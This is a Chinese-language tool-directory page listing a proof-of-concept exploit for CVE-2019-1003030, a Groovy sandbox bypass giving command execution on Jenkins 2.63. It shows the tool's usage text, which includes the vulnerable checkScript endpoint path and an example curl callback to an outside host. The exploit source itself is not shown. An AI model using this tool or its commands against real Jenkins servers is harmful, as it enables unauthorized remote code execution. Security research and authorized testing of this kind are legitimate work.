Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2019-1003030 — 针对 jenkins 2.63 的 CVE-2019-1003030 PoC | Kitploit
工具/GitHubGitHub/cyberbelly/poc-cve-2019-1003030
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubcyberbelly/poc-cve-2019-1003030

PoC-CVE-2019-1003030

针对 jenkins 2.63 的 CVE-2019-1003030 PoC

查看仓库
32个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Jenkins 2.63 脚本安全沙箱绕过 PoC

该项目自动化了创建并向 Jenkins 2.63 所使用的 SecureGroovyScript 验证端点投递 Groovy 载荷的过程。
该工具支持交互模式和一次性执行模式。由于漏洞利用不会返回输出,你需要自行进行一些验证(例如调用你的 AP)来确认其是否生效。

该工具支持:

  • 交互式命令模式
  • 单条命令执行
  • GET 和 POST 请求
  • 可选的 Jenkins CSRF crumb 支持

免责声明

本项目仅用于安全研究、CTF、实验环境以及授权的渗透测试。禁止在未获明确许可的情况下对任何系统使用。

root@kitploit:~
usage: Poc.py -u http://10.10.10.10:8080/  [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]

PoC for sandbox bypass for jenkins 2.63

options:
  -h, --help            show this help message and exit
  -u, --url URL         ip of target
  -X, --method METHOD   post or get
  -b, --breadcrum BREADCRUM
                        optional jenkins crumb string
  -c, --command COMMAND
                        command to run on jenkins, not output expected
  -p, --path PATH       path to the script, you might prepend more

省略 -c 选项可进入交互式提示界面。示例见下文,遗憾的是没有输出返回,只要没有收到 404 错误,就说明它应该可以工作。

image
下载工具